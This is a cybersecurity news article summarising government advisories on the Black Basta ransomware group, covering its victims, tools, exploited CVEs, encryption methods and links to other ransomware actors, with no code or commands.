Black Basta Ransomware Targets Critical Infrastructure Globally
The Black Basta ransomware-as-a-service (RaaS) group has made a significant impact since its inception in April 2022, successfully compromising over 500 private and critical infrastructure entities across North America, Europe, and Australia. Recent joint advisories released by leading cybersecurity authorities, including the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS), reveal that the group’s activities have resulted in data encryption and theft from at least 12 of the 16 critical infrastructure sectors.
According to the advisory, Black Basta affiliates often initiate attacks using common entry techniques such as phishing and exploiting known vulnerabilities. Once access is achieved, they employ a double-extortion strategy, encrypting systems while simultaneously exfiltrating sensitive data. Notably, the ransom notes generated at the conclusion of these attacks take a more unconventional approach; they lack specific ransom demands or payment details, instead providing victims with a unique code and instructions to engage with the attackers via a .onion URL.
Emerging initially in April 2022 through the QakBot malware, Black Basta has rapidly evolved into a persistent threat within the ransomware landscape. Malwarebytes statistics indicate that the group was linked to 28 of the 373 confirmed ransomware attacks in April 2024 alone, reinforcing Kaspersky’s assessment of Black Basta as the 12th most active ransomware family last year. Additionally, the group has exhibited a notable increase in activity, with a 41% rise in attacks during the first quarter of 2024 compared to the previous quarter.
There are indications that Black Basta is connected to the notorious FIN7 cybercrime group, which has shifted its focus towards ransomware since 2020. Techniques employed by Black Basta include the use of various tools such as SoftPerfect for network reconnaissance, BITSAdmin, Cobalt Strike, ConnectWise ScreenConnect, and PsExec for lateral movement, alongside Mimikatz for privilege escalation. Exploiting vulnerabilities in Microsoft services, such as ZeroLogon (CVE-2020-1472) and PrintNightmare (CVE-2021-34527), has also been crucial to obtaining elevated permissions.
In some instances, the attackers have deployed a tool named Backstab, designed to disable endpoint detection and response (EDR) systems. This tool’s usage highlights the sophistication of the attacks, as it has also been associated with other ransomware groups such as LockBit. The encryption process itself utilizes the ChaCha20 algorithm coupled with an RSA-4096 public key while ensuring that volume shadow copies are deleted to prevent system recovery.
The healthcare sector particularly stands out as a prime target for Black Basta due to its reliance on technology, vast amounts of sensitive personal health information, and the severe implications that disruptions can have on patient care. The current cybersecurity landscape is increasingly tumultuous, evidenced by the rise of other ransomware campaigns, such as CACTUS, which actively exploit vulnerabilities in platforms like Qlik Sense.
Analysis from the NCC Group indicates ongoing vulnerabilities, with thousands of servers still at risk of exploitation from various threats. Despite a general decline in ransomware attacks recorded at an 18% reduction in Q1 2024, the evolving nature of these threats persists, with organizations facing a confluence of established and emerging ransomware groups.
Recent assessments by cybersecurity firm ReliaQuest identify potential rebranding within the ranks of ransomware actors, speculating that the DarkVault group may serve as the successor to LockBit given observed similarities in branding. As ransomware tactics continue to diversify, it is crucial for businesses to understand the complex landscape of cyber threats and stay vigilant against potential vulnerabilities that could lead to significant security breaches.
In summary, the Black Basta ransomware incident highlights the modern challenges faced by critical industries worldwide. Cyber adversaries leverage sophisticated tools and methods that reflect a shifting threat landscape, underscoring the necessity for robust cybersecurity measures and awareness among business owners to safeguard against relentless cybercrime.
